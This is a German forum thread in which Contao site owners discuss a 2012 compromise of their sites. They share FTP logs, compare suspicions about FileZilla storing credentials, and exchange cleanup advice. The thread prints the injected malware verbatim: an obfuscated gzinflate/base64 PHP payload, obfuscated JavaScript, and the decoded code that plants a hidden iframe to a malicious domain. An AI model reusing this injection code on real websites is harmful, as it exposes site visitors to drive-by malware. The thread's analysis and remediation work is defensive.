Contao 2.10.4 gehackt - JS/iFrame.rex

[bruc13]

Hallo,
ich habe mir schon die Wiki durchgelesen (http://de.contaowiki.org/Contao_gehackt).
Und kann im Moment nichts auszuschließen. Passiert ist es wahrscheinlich am 09.05.2012.

Hoster - Hostway, benutzt wird leider keine sftp verbindung.

Infiziert waren mehrere index.php Dateien im Ordner typolight,contao, sowie manche index.html files in system/html, system/scripts
im root index.php

PHP-Code:

#f071c3#
echo(gzinflate(base64_decode("zVZbb5swFP4tgwegiDQ2Npe5bA/RfsEeozykCRSqNARwWy1R//t8fKEkbVJWbdIkLub4nPOdO77pVm214994++vQZOt69fiQb/lk1eZLnv/Y5PDlWuvqyfJYM1nudvl2PSurzdptfEvQXlZLvird5tk7lFkwRfiashdQtmtrXvNfu9yw3Lb5besdOp795G21vWP7feYsN45875+cSfd42/HWRTgMEMaev9+zrsvmC1ZkTtE6vlM/iMesdFjhC8l2phbNXb3OnbmlxK2FSwLsseeMl1XH8ux5Xgz2EAK9C7bNrHBCbbgpgsfURtRGqU1SmxJBIAlQY3gAE0lhRQTFxlhw96TYDqWSUH+fMNMIUIQEkAiyidQI4mGiP3oJgY4SCa1NSJWYJCKpAMhYQFFDiUAV1Z6cekSjUwhBARRY4uREMgIpZBhDZboy7AzOuFglClcZFb+6Gtk4vWAqosoC2AEVuA8FRTKy4gIvBAbsYhNXkxaAjLQTsTJWvoVJyl5i4FR8qbYUacdiwHkFxaEKfc+MNBIywMqsCxKRNiwd1MvAq0TrinorDCXsg0dV5iSWNlReKuAqpca1Xo90pfcY2HREEs1ENEg8yJDSZap6Kl1LwB21EWspOqRKP8Ip5FXl42xyBROKLtXhkCDRlekkeccfNLLi3+8V04aR1CPHAE5NJ4yob6LrW1LJMIQXB4Np9gsN0Le9CtFUdlM0nDwmu3HfYJDT+KTRkslJK6nyRP+ym94z+03t4z8p+qP2f1v7yqcRiB+3R4/0cZeMRj1upMGMGK9i0HIfyn+mQt5Ov6M6OR5nf6ssz0zRUcif+hv9D39uaJpYj+pXTCEU4kF9S8NANQyls5PSmrtu7n23OuurOI751s7yrU3FxVHHWtr95qPeNacgz2NF3bpVFgU4QHCzKqAk/ZJNWeX73uE+q1hVuB33xBGs6/yOT4q2fpiV4tgljltugK7KKxf56Go7v18IdS+NYGO524jlzbU+VP4G")));
#/f071c3# 


index.html
Es wird daraus ein javascript:

HTML-Code:

<!--f071c3--><script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="3.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-565!=0;i++){j=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script><!--/f071c3-->

Ich denke das ist ein Virus, der die Daten durch FTP (Filezilla) infiziert.

Danke für jede Hilfe!

[FloB]

http://de.contaowiki.org/Contao_geha...ierten_Systems

Auf jeden Fall auch mal mit dem Contao-Check drüber, aber der kontrolliert nicht eigene Dateien (templates/, tl_files/, etc.).

Edit: Ich habe das Script mal analysiert, im Endeffekt versucht es (in bestimmten Browsern) einen 565 Zeichen langen Null-String per Eval auszuführen, wahrscheinlich um einen Overflow (und/oder Absturz) auszulösen und dadurch eine Browser-Lücke auszunutzen und Maschinencode ausführen zu können.
Ich fürchte, dass dieser Code allein nicht alles war – was für einen Sinn hat es, einen Browser abstürzen zu lassen, wenn man dann nicht eine eventuelle Lücke ausnutzt? Demenstprechend fürchte ich, dass noch mehr bösartiger Code bei dir eingeschleust wurde. Womöglich wurde das schon von deinem Anti-Virus-Programm gefiltert? Nichtsdestotrotz muss da IMO noch mehr sein.

[FloB]

Jetzt habe ich mir die PHP-Message genauer angeschaut, und siehe da: die beiden Stücke passen gar nicht zusammen. Ergebnis des gzinflate():

PHP-Code:

<script>try{q=document.createElement("div");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='qgode'["substr"](4-2);w=this;e=w[f["substr"](11)+zz];n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#50.5#49.5#57#56#56#56.5#47.5#49#47.5#22#48.5#54.5#53.5#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#50.5#49.5#57#56#56#56.5#47.5#49#47.5#22#48.5#54.5#53.5#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-549!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script> 


Ergebnis des JS (der Code, der in eval ausgeführt werden soll):

Code:

"\t\tif (document.getElementsByTagName('body')[0]){\r\t\t\tiframer();\r\t\t} else {\r\t\t\tdocument.write(\"<iframe src='http://getrrsada.com' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>\");\r\t\t}\r\t\tfunction iframer(){\r\t\t\tvar f = document.createElement('iframe');f.setAttribute('src','http://getrrsada.com');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');\r\t\t\tdocument.getElementsByTagName('body')[0].appendChild(f);\r\t\t}"

Die Domain "gerrsada.com" (Achtung, enthält möglicherweise Malware!) enthält (laut Google) Schmuddelzeug, aber am ehesten wird das wohl zum verbreiten von Malware benutzt oder schlicht und einfach zum Erschleichen von Geldleistungen dort Werbender. Der DNS-Record ist von PrivacyProtect geschützt. Ich habe einen Abuse-Report geschickt. Ich bezweifle aber, dass das etwas nützt.

Offensichtlich ist auf deiner Website der Code bereits modifiziert worden (d. h. die Angreifer haben konstant Zugriff auf deinen Webspace), oder es wurden verschiedene Dateien mit unterschiedlichem Code verändert.


Bitte melde dich bei deinem Hoster und beschreibe das Problem, die müssen umgehend Protokolle und andere Kunden auf diesem Server unter die Lupe nehmen!

[bruc13]

Hallo FloB,

Danke für deine Hilfe.

Kurzes Update, nach dem säubern von diesen Code blocken und ändern aller Passwörter (FTP,DB, Contao),
war es am nächsten Morgen wieder da, und sogar noch mehr.
Obwohl ich meine andere Seite, die auch auf Contao läuft nicht aufgerufen habe
(Nicht im Filezilla, im web auch nicht), waren die gleichen Dateien auch modifiziert,
mit dem Zeitpunkt von gestern, wo ich mit der Infizierten Seite beschäftigt war.

Also kann der Virus anscheint sich über Filezilla verbreiten?
Hat sich selbst mit der andrer Seite verbunden und die Dateien modifiziert?
(Ich habe im Server-Manager von Filezilla mehrere Webseiten drin).

Ich habe immer alle Sicherheits-Updates gemacht, auch das Letzte mit der popup.php von März.
Kann noch irgendwo eine Sicherheits-Schwachstelle im Contao sein?

[FloB]

Das klingt am ehesten danach, dass dein Hoster infiziert ist, und die Infektion über einen anderen Nutzer eingeschleust wurde sowie der Server nicht ausreichend gesichert. Nicht auszuschließen ist weiterhin ein Virus auf deinem PC. Contao theoretisch auch, aber eher unwahrscheinlich (nutzt du den Safe-Mode-Hack?).

Informiere auf jeden Fall deinen Hoster! Verweise auch auf diesen Thread.

Wie sieht denn der aktuelle Snippet aus?

BTW: Habe den ISP informiert, dem die IP gehört, zu der die eingebundene Domain auflöst; sie haben das Problem an den Kunden weitergegeben, wenn der es nicht innerhalb von 8h löst, wird er deaktiviert. D. h., dass zumindest der letzte Schnipsel keinen Schaden anrichten wird.

[bruc13]

Hi, nee ich nutze kein Safe mode hack.
Und ich war auf der Webseite ewig nicht mehr drauf.
In ftp Logs sieht man :

Code:

Wed May  9 01:42:24 2012 0 213.241.... 8 /httpdocs/x84kTpJv.php b _ i r 
Wed May  9 01:42:25 2012 0 213... 8 /httpdocs/x84kTpJv.php b _ d r 
Wed May  9 01:42:26 2012 0 213... 8 /httpsdocs/6ngJk9LV.php b _ i r 
Wed May  9 01:42:26 2012 0 213... 8 /httpsdocs/6ngJk9LV.php b _ d r 
Wed May  9 01:42:27 2012 0 213... 8961 /httpdocs/index.php b _ o r 
Wed May  9 01:42:27 2012 0 213... 10345 /httpdocs/index.php b _ i r 
Wed May  9 01:42:27 2012 0 213... 7199 /httpsdocs/index.html b _ o r 
Wed May  9 01:42:28 2012 0 213... 10001 /httpsdocs/index.html b _ i r

Davor war ich,das letzte mal drin im März und popup.php aktualisiert.
Am 11 Mai war von ganz ander ip (Proxyserver) vile mehr gemacht worden.

Code:

Fri May 11 05:38:52 2012 0 78.138... 311 /httpdocs/system/html/index.html b _ o r 
Fri May 11 05:38:53 2012 0 78.138... 3001 httpdocs/system/html/index.html b _ i r 
Fri May 11 05:38:54 2012 0 78.138... 311 /httpdocs/system/scripts/index.html b _ o r 
Fri May 11 05:38:54 2012 0 78.138... 3001 /httpdocs/system/scripts/index.html b _ i r

Dann war Samstag ruhe, und Sonntag wieder, aber wie immer ganz andere ip.

Hoster habe ich noch am Samstag kontaktiert. Habe leider noch keine Antwort.
Mein Rechner habe ich mit Avira 2 Mal durchgelaufen, ausßer diesen JS/frame.rex hat er nichts gefunden.

[FloB]

Wenn der Hoster nicht bis zum Nachmittag reagiert, rufe an!

Ändere deine Passwörter an einem anderen Computer, der auch nicht in deinem Netzwerk ist (nicht in öffentlichem WLAN!). Schmeiß' FileZilla runter, nutze WinSCP (Windows) oder Cyberduck (Mac). Womöglich solltest du einen Computer neu aufsetzen (Betriebssystem, Version?). Hat noch jemand anderes Zugriff auf deine Login-Daten / FTP-Zugang oder nur du? Greifst du nur mit einem Rechner auf den FTP-Zugang zu oder loggst du dich mit verschiedenen Computern ein (wenn ja, können die ebenfalls verseucht sein)? Welches Antiviren-Programm setzt du ein?

Bitte beachte, dass nicht alle Virenprogramme alle Schädlinge erkennen, sondern nur die, die sie vom Hersteller mitgeteilt bekommen. Ebenso können sich Viren z. B. im MBR verstecken o. ä. Lade dir an einem anderen PC eine Wiederherstellungs-CD mit Virenscanner herunter (jede größere Computerzeitschrift hat soetwas im Angebot) und starte und scanne deinen Computer von dieser CD; nur so kannst du relativ sicher sein, dass dein Computer nicht verseucht ist. Wie gesagt, am besten ist eigentlich ein neu aufsetzen des PC.

[simplex3]

Moin.
Ich hatte vor einigen Wochen ähnliche Probleme bzw. ein paar meiner Kunden. Verschiedene Hoster und auch nicht nur Contao-Seiten.
Jedesmal war definitiv FileZilla Schuld, da das Programm die FTP-Daten unverschlüsselt abspeichert (also FileZilla in Verbindung mit einem Virus, der ja auch erstmal irgendwie auf den Rechner kommen muss...)
Ich habe FileZilla komplett gelöscht und alle Passwörter geändert und benutze seit dem nur noch WinSCP, die FireFTP-Erweiterung von Firefox und Totalcommander. Meinen Kunden haben das auch geändert. Seither ist diesbezüglich nichts mehr passiert.

Zusätzlich habe ich diverse Anti-Viren- und Anti-Spyware-Programme durchlaufen lassen (empfehle mal: Desinfect. Ist auf einer der letzten ct in neuer Version auf DVD gewesen. Dann noch Spybot o.ä.)

Bis denne..

[aadursun]

Aua, dass kann bei produktiven, größeren Kundenprojekten richtig weh tun!!

Wie sichert ihr die Kundenprojekte, in welchem Rythmus und mit welchem Tool??


MfG.

aadursun

[FloB]

Stündlich / täglich per rsync+ssh auf Strato HiDrive (ähnlich wie Dropbox auch mit Versionierung, aber Serverstandort DE). Dazu gelegentlich Hard Copies. Da die Daten sich wenig ändern bzw. Datenverlust nicht dramatisch ist, reicht das. Ansonsten dürfte diese Variante wahrscheinlich zu kritisch sein.

[klehmann]

bin froh dass es nich nur mir so geht

hat am sonntag abend angefangen


auf einem acc den ich ewig nichts mehr gemacht habe falls es an filezilla liegen würde (den habe ich jetzt entfernt)
das komische ist ich arbeite seit einem jahr auf linux(ubuntu) hab kein windows mehr wegen der gefahr von viren

zudem waren im filezilla nur 3 accs eingetragen die seiten die betroffen waren hatte ich noch nicht mal im filezilla eingerichtet
dennoch waren dann auch andere seiten auf anderen provider betroffen (nicht nur contao-projekte) es sind immer nur die seiten
"index" "main" und "page" zudem installiert es ein file getarnt als jquery das ein aufruf auf eine andere webseite macht

bin jetzt ziemlich ratlos was es sein kann oder woher es kommt

provider hab ich angeschrieben warte jetzt auf antwort
werde jetzt wohl wieder alles plätten müssen
(aber erst beweise sichern)

meine frage an euch: kennt ihr viren die linux-systeme befallen?

gruss klehmann